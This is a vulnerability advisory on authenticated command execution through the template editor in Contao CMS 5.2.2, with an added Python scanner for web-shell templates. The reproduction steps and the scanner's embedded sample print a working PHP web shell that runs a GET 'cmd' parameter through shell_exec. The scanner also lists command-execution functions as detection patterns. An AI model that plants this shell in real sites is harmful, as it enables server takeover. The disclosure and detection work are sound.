Contao CMS | Authenticated Remote Command Execution
Information

| Field | Value |
|---|---|
| Software Type | Web App |
| Software Name | Contao CMS |
| Affected Version | 5.2.2 |
| Software Vendor | Contao CMS |
| Software Link | https://github.com/contao/contao |
| Severity | High |
| CVSS Score | 8.2 |
| CVE Link | N/A |
| Affected Assets | 84092+ |
| Date of Discovery | March 10th, 2025 |
| PoC Exploit | N/A |
Description
Contao version 5.2.2 exposes a .html5 template that actually contains PHP code to backend administrator users or to anyone with template editor privileges. At first glance this appears to be an HTML file, but when opened for editing it contains PHP code, and it can be modified to execute commands on the server. The file effectively acts as a backdoor that lets an administrator or template editor escalate privileges and take over the server. There is no warning or confirmation step to alert users to harmful or malicious edits.
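The template editor described above exposes a PHP template behind a .html5 name, so the check a defender wants is an integrity scan of the templates directory for command-execution sinks combined with request-controlled input. The following is an added example, not code from the advisory or from Contao; it assumes the scan is pointed at the installation's templates directory, and the two sample bodies it embeds are constructed from the advisory's original and modified template:

```python
# Added example (not Contao code): flag .html5 templates that behave like web shells
import re
from pathlib import Path

# PHP functions that execute OS commands or arbitrary code
DANGEROUS_SINKS = ("shell_exec", "exec", "system", "passthru", "popen",
                   "proc_open", "eval", "assert", "create_function")
# Request-controlled superglobals reachable from a URL or form post
TAINT_SOURCES = ("$_GET", "$_POST", "$_REQUEST", "$_COOKIE")
SINK_RE = re.compile(r"\b(" + "|".join(map(re.escape, DANGEROUS_SINKS)) + r")\s*\(")
SOURCE_RE = re.compile("|".join(map(re.escape, TAINT_SOURCES)))

def scan_template(text: str) -> list[tuple[int, str, str]]:
    """Return (line, kind, snippet) findings for one template body."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in SINK_RE.finditer(line):
            findings.append((lineno, "sink:" + m.group(1), line.strip()))
        for m in SOURCE_RE.finditer(line):
            findings.append((lineno, "source:" + m.group(0), line.strip()))
    return findings

def risk_level(findings) -> str:
    """Request input and a command sink in the same template is the web-shell pattern."""
    kinds = {kind.split(":")[0] for _, kind, _ in findings}
    if {"sink", "source"} <= kinds:
        return "critical"
    if "sink" in kinds:
        return "high"
    return "medium" if "source" in kinds else "clean"

def scan_directory(root: str) -> dict[str, tuple[str, list]]:
    """Scan every .html5 file under root (the installation's templates/ dir, assumed)."""
    results = {}
    for path in sorted(Path(root).rglob("*.html5")):
        findings = scan_template(path.read_text(encoding="utf-8", errors="replace"))
        results[str(path)] = (risk_level(findings), findings)
    return results

# Constructed samples: the advisory's original template and its modified form
ORIGINAL = """<?php $this->extend('mod_article'); ?>
<?php if (!$this->noMarkup): ?>
<?php $this->block('content'); ?>
<div class="mod_article__inner">
<?= $this->parent(); ?>
</div>
<?php $this->endblock(); ?>
<?php endif; ?>"""
MODIFIED = ORIGINAL.replace("<?= $this->parent(); ?>", "<?php $cmd = $_GET['cmd'] ?? ''; ?>\n"
    "<?php $response = $cmd ? shell_exec($cmd) : ''; ?>\n<?= $this->parent(); ?>\n<?= $response; ?>")
```

Running `scan_directory` on a schedule and alerting on any template whose level changes from "clean" turns the editor's silent acceptance of PHP into a detectable event.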
Reproduce
To reproduce this issue, log in as a backend user with template editor privileges. Navigate to /contao?do=tpl_editor and click “Expand all”; you will see a .html5 page, in my case it was mod_article.html5.
No other file in this directory can be modified even with administrator privileges; this is the only file that allows modification and can execute PHP code.
Click the triple dots located on the right side of this file and you will see two edit options: one to edit the element ID and another to edit the source code. Click “Edit the source text of file”. You may be redirected to a URI like this:
/contao?do=tpl_editor&act=source&id=templates%2Fcontaodemo%2Fmod_article.html5
The original content was this:
```php
<?php $this->extend('mod_article'); ?>
<?php if (!$this->noMarkup): ?>
<?php $this->block('content'); ?>
<div class="mod_article__inner">
<?= $this->parent(); ?>
</div>
<?php $this->endblock(); ?>
<?php endif; ?>
```
I modified it to the following to create a GET parameter for running shell commands using shell_exec:
```php
<?php $this->extend('mod_article'); ?>
<?php if (!$this->noMarkup): ?>
<?php $this->block('content'); ?>
<div class="mod_article__inner">
<?php $cmd = $_GET['cmd'] ?? ''; ?>
<?php $response = $cmd ? shell_exec($cmd) : ''; ?>
<?= $this->parent(); ?>
<?= $response; ?>
</div>
<?php $this->endblock(); ?>
<?php endif; ?>
```
You can interact with the GET parameter by visiting the following URI:
Proof of Concept (PoC) Video
Posted on: May 24, 2025 04:06 AM